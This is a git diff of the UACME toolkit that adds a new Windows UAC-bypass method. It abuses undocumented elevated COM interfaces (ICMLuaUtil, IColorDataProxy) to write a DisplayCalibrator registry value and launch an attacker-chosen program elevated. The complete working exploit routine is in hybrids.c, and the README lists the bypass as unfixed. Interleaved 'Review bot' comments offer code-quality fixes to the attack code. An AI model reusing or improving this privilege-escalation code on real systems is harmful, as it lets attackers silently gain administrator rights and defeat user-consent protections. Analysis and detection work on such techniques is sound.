diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe index 7609aad..e5ea3ea 100644 Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe index 4135187..8dcb35a 100644 Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ diff --git a/README.md b/README.md index 1d012d9..e233572 100644 --- a/README.md +++ b/README.md @@ -353,6 +353,14 @@ Keys (watch debug output with dbgview or similar for more info): * Works from: Windows 7 (7600) * Fixed in: currently unavailable in preview builds of Windows 10 RS4 * How: Shell redesign +43. Author: Oddvar Moe derivative + * Type: Elevated COM interface + * Method: IColorDataProxy, ICMLuaUtil + * Target(s): Attacker defined + * Component(s): Attacker defined + * Works from: Windows 7 (7600) + * Fixed in: unfixed :see_no_evil: + * How: - Note: * Method (6) unavailable in wow64 environment starting from Windows 8; diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index 8fb107b..7c90b2e 100644 Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h index f4d83e4..45dc376 100644 --- a/Source/Akagi/consts.h +++ b/Source/Akagi/consts.h @@ -4,9 +4,9 @@ * * TITLE: CONSTS.H * -* VERSION: 2.82 +* VERSION: 2.84 * -* DATE: 02 Nov 2017 +* DATE: 04 Nov 2017 * * Global consts definition file. * @@ -24,6 +24,7 @@ #define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system" #define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" +#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" #define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls" #define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command" #define T_MSC_SHELL L"Software\\Classes\\mscfile\\shell\\open\\command" 
@@ -153,15 +154,19 @@ #define COR_PROFILER_PATH L"COR_PROFILER_PATH" #define COR_ENABLE_PROFILING L"COR_ENABLE_PROFILING" +#define T_CALIBRATOR_VALUE L"DisplayCalibrator" + // //COM objects elevation. // +#define T_CLSID_ColorDataProxy L"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}" #define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" #define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}" #define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}" #define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}" #define T_CLSID_UninstallStringLauncher L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}" +#define T_IID_IColorDataProxy L"{0A16D195-6F47-4964-9287-9F4BAB6D9827}" #define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}" #define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}" #define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}" diff --git a/Source/Akagi/methods/api0cradle.h b/Source/Akagi/methods/api0cradle.h index 78b654d..d228525 100644 --- a/Source/Akagi/methods/api0cradle.h +++ b/Source/Akagi/methods/api0cradle.h @@ -4,9 +4,9 @@ * * TITLE: API0CRADLE.H * -* VERSION: 2.79 +* VERSION: 2.83 * -* DATE: 16 Aug 2017 +* DATE: 04 Nov 2017 * * Prototypes and definitions for api0cradle method. * @@ -56,14 +56,19 @@ typedef struct ICMLuaUtilVtbl { HRESULT(STDMETHODCALLTYPE *ShellExec)( __RPC__in ICMLuaUtil * This, _In_ LPCTSTR lpFile, - _In_opt_ LPCTSTR lpParameters, - _In_opt_ LPCTSTR lpDirectory, - _In_ ULONG fMask, - _In_ ULONG nShow + _In_opt_ LPCTSTR lpParameters, + _In_opt_ LPCTSTR lpDirectory, + _In_ ULONG fMask, + _In_ ULONG nShow ); - HRESULT(STDMETHODCALLTYPE *Method8)( - __RPC__in ICMLuaUtil * This); + HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)( + __RPC__in ICMLuaUtil * This, + _In_ HKEY hKey, + _In_opt_ LPCTSTR lpSubKey, + _In_opt_ LPCTSTR lpValueName, + _In_ LPCTSTR lpValueString + ); HRESULT(STDMETHODCALLTYPE *Method9)( __RPC__in ICMLuaUtil * This); 
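Review bot: The new `SetRegistryStringValue` slot in `ICMLuaUtilVtbl` declares its string parameters as `LPCTSTR`, which follows the build's UNICODE setting, while the caller added to hybrids.c in this commit passes wide strings (`T_DISPLAY_CALIBRATION`, `T_CALIBRATOR_VALUE` and an `LPWSTR` buffer). Declaring them as `_In_opt_ LPCWSTR lpSubKey`, `_In_opt_ LPCWSTR lpValueName` and `_In_ LPCWSTR lpValueString` keeps the prototype independent of the character set; `ShellExec` just above has the same issue. The slot was the placeholder `Method8` before, and hybrids.c calls these interfaces undocumented, so a one-line comment saying the signature is inferred rather than taken from a published header would help the next reader. The struct begins and continues outside this hunk.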
diff --git a/Source/Akagi/methods/cdproxy.h b/Source/Akagi/methods/cdproxy.h
new file mode 100644
index 0000000..e4c22d9
--- /dev/null
+++ b/Source/Akagi/methods/cdproxy.h
@@ -0,0 +1,82 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: CDPROXY.H
+*
+* VERSION: 2.83
+*
+* DATE: 04 Nov 2017
+*
+* Prototypes and definitions for ColorDataProxy method.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+typedef interface IColorDataProxy IColorDataProxy;
+
+typedef struct IColorDataProxyVtbl {
+
+ BEGIN_INTERFACE
+
+ HRESULT(STDMETHODCALLTYPE *QueryInterface)(
+ __RPC__in IColorDataProxy * This,
+ __RPC__in REFIID riid,
+ _COM_Outptr_ void **ppvObject);
+
+ ULONG(STDMETHODCALLTYPE *AddRef)(
+ __RPC__in IColorDataProxy * This);
+
+ ULONG(STDMETHODCALLTYPE *Release)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method1)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method2)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method3)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method4)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method5)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method6)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method7)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method8)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method9)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method10)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method11)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *LaunchDccw)(
+ __RPC__in IColorDataProxy * This,
+ _In_ HWND hwnd);
+
+ END_INTERFACE
+
+}
*PIColorDataProxyVtbl; + +interface IColorDataProxy +{ + CONST_VTBL struct IColorDataProxyVtbl *lpVtbl; +}; diff --git a/Source/Akagi/methods/fwcpllua.h b/Source/Akagi/methods/fwcpllua.h index a5a8d2c..d9984b5 100644 --- a/Source/Akagi/methods/fwcpllua.h +++ b/Source/Akagi/methods/fwcpllua.h @@ -18,7 +18,6 @@ *******************************************************************************/ #pragma once - typedef interface IFwCplLua IFwCplLua; typedef struct IFwCplLuaInterfaceVtbl { diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c index aff55fd..5123487 100644 --- a/Source/Akagi/methods/hybrids.c +++ b/Source/Akagi/methods/hybrids.c @@ -4,9 +4,9 @@ * * TITLE: HYBRIDS.C * -* VERSION: 2.82 +* VERSION: 2.83 * -* DATE: 02 Nov 2017 +* DATE: 04 Nov 2017 * * Hybrid UAC bypass methods. * 
@@ -2182,3 +2182,120 @@ BOOL ucmFwCplLuaMethod( return SUCCEEDED(r); } + +/* +* ucmDccwCOMMethod +* +* Purpose: +* +* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces. +* This function expects that supMasqueradeProcess was called on process initialization. +* +*/ +BOOL ucmDccwCOMMethod( + _In_opt_ LPWSTR lpszPayload +) +{ + HRESULT r = E_FAIL; + BOOL bCond = FALSE; + + LPWSTR lpBuffer = NULL; + SIZE_T sz = 0; + + IID xIID_ICMLuaUtil; + IID xIID_IColorDataProxy; + ICMLuaUtil *CMLuaUtil = NULL; + IColorDataProxy *ColorDataProxy = NULL; + + WCHAR szBuffer[MAX_PATH + 1]; + + do { + + // + // Select payload. + // + if (lpszPayload != NULL) { + lpBuffer = lpszPayload; + } + else { + //no payload specified, use default cmd.exe + RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); + supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH); + lpBuffer = szBuffer; + } + + sz = _strlen(lpBuffer); + if (sz == 0) + break; + + // + // Create elevated COM object for CMLuaUtil. + // + if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) { + break; + } + + r = ucmMasqueradedCoGetObjectElevate( + T_CLSID_CMSTPLUA, + CLSCTX_LOCAL_SERVER, + &xIID_ICMLuaUtil, + &CMLuaUtil); + + if (r != S_OK) + break; + + if (CMLuaUtil == NULL) { + r = E_FAIL; + break; + } + + // + // Write new custom calibrator value to HKLM. + // + r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil, + HKEY_LOCAL_MACHINE, + T_DISPLAY_CALIBRATION, + T_CALIBRATOR_VALUE, + lpBuffer); + + if (FAILED(r)) + break; + + // + // Create elevated COM object for ColorDataProxy. + // + if (IIDFromString(T_IID_IColorDataProxy, &xIID_IColorDataProxy) != S_OK) { + break; + } + + r = ucmMasqueradedCoGetObjectElevate( + T_CLSID_ColorDataProxy, + CLSCTX_LOCAL_SERVER, + &xIID_IColorDataProxy, + &ColorDataProxy); + + if (r != S_OK) + break; + + if (ColorDataProxy == NULL) { + r = E_FAIL; + break; + } + + // + // Run our "custom calibrator". 
+ // + ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0); + + } while (bCond); + + if (CMLuaUtil != NULL) { + CMLuaUtil->lpVtbl->Release(CMLuaUtil); + } + + if (ColorDataProxy != NULL) { + ColorDataProxy->lpVtbl->Release(ColorDataProxy); + } + + return SUCCEEDED(r); +} diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h index d3672e9..48c9581 100644 --- a/Source/Akagi/methods/hybrids.h +++ b/Source/Akagi/methods/hybrids.h @@ -4,9 +4,9 @@ * * TITLE: HYBRIDS.H * -* VERSION: 2.82 +* VERSION: 2.83 * -* DATE: 02 Nov 2017 +* DATE: 04 Nov 2017 * * Prototypes and definitions for hybrid methods. * @@ -111,3 +111,6 @@ BOOL ucmMethodCorProfiler( BOOL ucmFwCplLuaMethod( _In_opt_ LPWSTR lpszPayload); + +BOOL ucmDccwCOMMethod( + _In_opt_ LPWSTR lpszPayload); diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index fef2fd5..6e29f76 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -4,9 +4,9 @@ * * TITLE: METHODS.C * -* VERSION: 2.81 +* VERSION: 2.83 * -* DATE: 28 Oct 2017 +* DATE: 04 Nov 2017 * * UAC bypass dispatch. * @@ -53,7 +53,8 @@ UCM_API(MethodHakril); UCM_API(MethodCorProfiler); UCM_API(MethodCOMHandlers); UCM_API(MethodCMLuaUtil); -UCM_API(MethodFwCpl); +UCM_API(MethodFwCplLua); +UCM_API(MethodDccwCOM); UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, 
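Review bot: The result of `LaunchDccw` near the end of `ucmDccwCOMMethod` is discarded, so the function returns `SUCCEEDED(r)` from the preceding `ucmMasqueradedCoGetObjectElevate` call and reports success even when the launch itself failed. Assigning it, `r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);`, makes the return value truthful. The header comment says "CCMLuaUtil" where the code uses `ICMLuaUtil`. The comment should also state that the routine writes the `DisplayCalibrator` value under the HKLM `ICM\Calibration` key and leaves it in place on every exit path, because that machine-wide registry change outlives the call and is the artifact an analyst reviewing a host would look for.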
@@ -98,7 +99,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, - { MethodFwCpl, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE } + { MethodFwCplLua, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, + { MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE } }; /* @@ -776,7 +778,7 @@ UCM_API(MethodCMLuaUtil) return ucmCMLuaUtilShellExecMethod(szBuffer); } -UCM_API(MethodFwCpl) +UCM_API(MethodFwCplLua) { LPWSTR lpszPayload = NULL; @@ -795,3 +797,23 @@ UCM_API(MethodFwCpl) return ucmFwCplLuaMethod(lpszPayload); } + +UCM_API(MethodDccwCOM) +{ + LPWSTR lpszPayload = NULL; + + UNREFERENCED_PARAMETER(Method); + UNREFERENCED_PARAMETER(ExtraContext); + UNREFERENCED_PARAMETER(PayloadCode); + UNREFERENCED_PARAMETER(PayloadSize); + + // + // Select target application or use given by optional parameter. + // + if (g_ctx.OptionalParameterLength == 0) + lpszPayload = NULL; + else + lpszPayload = g_ctx.szOptionalParameter; + + return ucmDccwCOMMethod(lpszPayload); +} diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index 5cc0a85..7da719f 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -4,9 +4,9 @@ * * TITLE: METHODS.H * -* VERSION: 2.82 +* VERSION: 2.83 * -* DATE: 02 Nov 2017 +* DATE: 04 Nov 2017 * * Prototypes and definitions for UAC bypass methods table. * @@ -61,7 +61,8 @@ typedef enum _UCM_METHOD { UacMethodCorProfiler, //+ UacMethodCOMHandlers, //+ UacMethodCMLuaUtil, //+ - UacMethodFwCpl, //+ + UacMethodFwCplLua, //+ + UacMethodDccwCOM, //+ UacMethodMax } UCM_METHOD; 
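Review bot: The renamed `MethodFwCplLua` row also changes its last initializer from `TRUE` to `FALSE`, and nothing in the hunk says why; a behavioural change riding on a rename is easy to miss. Each row is a list of positional values with no field names, so a comment above `ucmMethodsDispatchTable` listing the columns in order would make such flips reviewable (the names would come from `UCM_API_DISPATCH_ENTRY` in methods.h, which this hunk does not show). The table is sized by `UCM_DISPATCH_ENTRY_MAX` while the enum in methods.h grows by one entry in this commit; whether the two are tied together is not visible here and is worth confirming.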
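Review bot: `MethodDccwCOM` repeats, as far as the visible context shows, the optional-parameter selection that `MethodFwCplLua` directly above it already carries, so the same if/else now exists in two dispatch stubs. The selection fits on one line, `lpszPayload = (g_ctx.OptionalParameterLength != 0) ? g_ctx.szOptionalParameter : NULL;`, or could move into one small static helper shared by both stubs. The comment "Select target application or use given by optional parameter" is also hard to parse; `// Use the optional parameter when one was supplied, otherwise let the method pick its default.` says what the code does.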
@@ -99,6 +100,7 @@ typedef struct _UCM_API_DISPATCH_ENTRY { #include "apphelp.h" #include "b33f.h" #include "carberp.h" +#include "cdproxy.h" #include "comet.h" #include "comfileop.h" #include "enigma0x3.h" diff --git a/Source/Akagi/tests/test.c b/Source/Akagi/tests/test.c index ffbd547..70934b2 100644 --- a/Source/Akagi/tests/test.c +++ b/Source/Akagi/tests/test.c @@ -4,9 +4,9 @@ * * TITLE: TEST.C * -* VERSION: 2.82 +* VERSION: 2.83 * -* DATE: 02 Nov 2017 +* DATE: 04 Nov 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED diff --git a/Source/Akagi/tests/test.h b/Source/Akagi/tests/test.h index a80b24e..93588cf 100644 --- a/Source/Akagi/tests/test.h +++ b/Source/Akagi/tests/test.h @@ -20,6 +20,9 @@ typedef interface ITestInterface ITestInterface; +typedef HRESULT (STDMETHODCALLTYPE *MethodPfn)( + __RPC__in ITestInterface * This); + typedef struct ITestInterfaceVtbl { BEGIN_INTERFACE @@ -29,13 +32,17 @@ typedef struct ITestInterfaceVtbl { __RPC__in REFIID riid, _COM_Outptr_ void **ppvObject); + ULONG(STDMETHODCALLTYPE *AddRef)( __RPC__in ITestInterface * This); ULONG(STDMETHODCALLTYPE *Release)( __RPC__in ITestInterface * This); - HRESULT(STDMETHODCALLTYPE *Method1)( + MethodPfn a[200]; + + +/* HRESULT(STDMETHODCALLTYPE *Method1)( __RPC__in ITestInterface * This); HRESULT(STDMETHODCALLTYPE *Method2)( @@ -81,7 +88,8 @@ typedef struct ITestInterfaceVtbl { __RPC__in ITestInterface * This); HRESULT(STDMETHODCALLTYPE *Method16)( - __RPC__in ITestInterface * This); + __RPC__in ITestInterface * This);*/ + END_INTERFACE } *PITestInterfaceVtbl; diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index 97c6819..c20ebd2 100644 --- a/Source/Akagi/uacme.vcxproj +++ b/Source/Akagi/uacme.vcxproj @@ -426,6 +426,7 @@ + diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters index a894fb7..8f0cc03 100644 --- a/Source/Akagi/uacme.vcxproj.filters 
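Review bot: In the second test.h hunk the sixteen named slots of `ITestInterfaceVtbl` are replaced by `MethodPfn a[200];`, with neither the one-letter name nor the count explained. The old declarations are kept as a `/* ... */` block, which the third hunk closes, instead of being deleted. A comment such as `/* placeholder slots; only indices that exist in the real object's vtable may be called */` is needed, since the struct now claims 200 entries regardless of how many the underlying interface has. Removing the commented-out declarations would leave version control as the record of the old layout.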
+++ b/Source/Akagi/uacme.vcxproj.filters @@ -296,6 +296,9 @@ Header Files\methods + + Header Files\methods + diff --git a/UACME.sha256 b/UACME.sha256 index dda77c1..bda3e8e 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -1,5 +1,5 @@ -04341ae85502f402ba09df680a59ad86edffb9e4d433b98d20bccbbfc74c7140 *Compiled\Akagi32.exe -67f0ad13918572c2b163185f03eb14b169f37d7863a13aadd5d3b1cfe3ade2b9 *Compiled\Akagi64.exe +5e2c78ab050bbb0390710df1766ca3431edb830d5c8bf552175b3b0b40dd3115 *Compiled\Akagi32.exe +30344b2d6335bd92331779bb3927275b20090f472345282e1a6d1515e86a4886 *Compiled\Akagi64.exe 12d2396c78432f3a0bd6281b39f3f83bf5573825aac475c94edba4886fd73ece *Compiled\UacInfo64.exe c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt cfab4c45f324596e4f9a6eabedec3d2c2867e03d122ddf4becdf8b50c1ec8026 *Source\uacme.sln 
@@ -13,19 +13,19 @@ ef42ba52ea3b16d206ea6367b0311f544631d6f5b6110550facfc9954884a76b *Source\Akagi\b 3ee61cd0352be04ee3af1edb159ae094d4c9bcfe00db6f45c2479c965b98783e *Source\Akagi\bin64res.rc 5b746ce038ee93a1f99e423c0aa0d39976fce2dafd4e7d9d446ab6f0f0fb2c95 *Source\Akagi\compress.c 9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h -f696a00694bebf94b3210a26d77cc1157cebe2818fc679017db1a5333e21a127 *Source\Akagi\consts.h +f12f0a7fc07640d44bc0517c4855708c7b72671f00e7846c65cbd10f34a001dc *Source\Akagi\consts.h 68a7f3e03ec247d54f8b4ae52012e69177dd05c4b608dd9ee3bbf75d49401577 *Source\Akagi\global.h 3d9da9b6f4f68d9140b4ec7c962b56206459c5bca98e1db1e584483524bee9ce *Source\Akagi\main.c a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -1f8ad6c4dd3f33f0c0277b823d0c5cb2e0413eef7b6b35df85da03018fb99e18 *Source\Akagi\Resource.rc +9b42af1fbe881ecc8cd22cd4d37446e810485befa9365a62a031865a2e81e2d7 *Source\Akagi\Resource.rc 4ba63fffb2838c59534b66f6f4e5960ff8559be59a01597ad560dc2cdcee3dbb *Source\Akagi\sup.c af229de9ed6dae7fe5364381ab3ac96e4ac0e9b6a8f42078259dbe8dbec2711d *Source\Akagi\sup.h a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress -2eb157a5d218534435d07c9dddcdad303ef23b5757449f1629ba78bb0dbf9334 *Source\Akagi\uacme.vcxproj -2b87dc9e056ad349cbd7a79ce043acf4fea771b05842ac7023f601c9b37ff6a6 *Source\Akagi\uacme.vcxproj.filters +3a563ced011f65d84309ecac6e518560393a8b62f19ce8ef18d95bc9d8a34d22 *Source\Akagi\uacme.vcxproj +5ead1ab3d46fd0e04779882dfb35df51c6ea51939fbac78b2a0d9ff12f713c85 *Source\Akagi\uacme.vcxproj.filters cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 
*Source\Akagi\uacme.vcxproj.user 2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c 1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h @@ -42,12 +42,13 @@ cf5e43ec5d5acb53045e88d8e8a2a34e3b3a2fbbdb4acb4ca37eb1c3e7b1d3dd *Source\Akagi\b d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib 63930fd4e5fa4e67ec923c88995362e4d91c4c7a66be1da26b57ec37d89f3e29 *Source\Akagi\methods\api0cradle.c -6e5c157d02b69f573345bb460adf0032fa6fd9b5f7c390699995dbd3ab12a812 *Source\Akagi\methods\api0cradle.h +a73b25f6f839f29dd91587e5b8c19ae707575f8791e3ef08dd262349a04c111a *Source\Akagi\methods\api0cradle.h c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h ff3430dee2f8043a4be9a1235a3baaedeeeeaec2a1befba068a46d9ef42f3c49 *Source\Akagi\methods\b33f.c 1ce892263ef00aa1ac52f365519e800d7ac4535ac55454f0c777b17033769d8c *Source\Akagi\methods\b33f.h e374e07b617a16d72dd21de250e4611866b509de15715957bed018ea07db62c3 *Source\Akagi\methods\carberp.c b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h +c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h 0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c 7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h 5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c 
@@ -56,15 +57,15 @@ b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\m 878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c 1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h -c80a6ec7ce870c8df4b9e15783dc077945852f7e9c078b49ba2f95a86bd222d9 *Source\Akagi\methods\fwcpllua.h +3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h 6e2608ff58c3f1777a1cb0464b896c99eefbf933db4a8ff4de3465b849e49e99 *Source\Akagi\methods\gootkit.c 7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h b0c8e8e88559fdb6ce96d2404c56b0830976d5f5911b89425cc26f686f36f02f *Source\Akagi\methods\hakril.c 6f2e173a90393eec705ad558c22874dbd41c07a597eff3448165a4124aaa442b *Source\Akagi\methods\hakril.h -f2fc69584696a2dfa052a6ff8650c715d526fc0b26258fe2f58c608f515f9a67 *Source\Akagi\methods\hybrids.c -534912bb33311a4e4dc35c12abd7a24642aa9e2acd94e2cba4896d7ba277295f *Source\Akagi\methods\hybrids.h -564fae5e3dee300847a3e0a09b24de853d8f510fc9dd0eb923a8fa2ec4dc80b4 *Source\Akagi\methods\methods.c -26d1b8fa856522556923d329d3324e4bb8b7698b7b74447f1a3b06b4491013b1 *Source\Akagi\methods\methods.h +9dd0de9e974824f28a6e02bfc3a6f37b5ac8edfa629fd87e2c4e1e73fa6c3c5f *Source\Akagi\methods\hybrids.c +354e8ec194b93264c998e7a999cedb909f7481eb0c0a5843a1fc129084bc8934 *Source\Akagi\methods\hybrids.h +b0eab04bb9fc3557270bf172429f21e41c20ee85d0f8b65989f1c06341bd9964 *Source\Akagi\methods\methods.c +b9776680e0f2ba72eff2a02619aae2c27c5debf194c690edae447c7faf919092 *Source\Akagi\methods\methods.h 4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c 9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h 
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c @@ -89,8 +90,8 @@ e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Akagi\m 604d1cdf45c5a95bc9cf1bbf39ca05ef83013541101d34971c5cd7577e3d5247 *Source\Akagi\minhook\hde\pstdint.h 43bf687a9fff071b5f46070db4d36c846f8e069cdc57485ee897c499aacdde23 *Source\Akagi\minhook\hde\table32.h b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Akagi\minhook\hde\table64.h -c3c98c9a4b43219bcd38bff7c21dd69af1e3c8912f338162e912ccabb495cff7 *Source\Akagi\tests\test.c -9b0ef3097318c0876b569b64f7ecdee3bba0a189aa770887d0b825ff7adc8dfb *Source\Akagi\tests\test.h +abf5350c10eedc9857741f0d221156007f3d78e283ae39a6421379685995c37c *Source\Akagi\tests\test.c +1402f6f278457fdea7bdedb49785c74d775c625c425fc347ece6652940c65878 *Source\Akagi\tests\test.h 09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress 4581ed25d561afd247c01d71d13c698b79503357f16d4c18832e01c2381ce630 *Source\Akatsuki\Akatsuki.vcxproj 9b57b5d6ca1ca38eb87ba36e82595525c4ccec1069ee81f4b24c6809c5b979b8 *Source\Akatsuki\Akatsuki.vcxproj.filters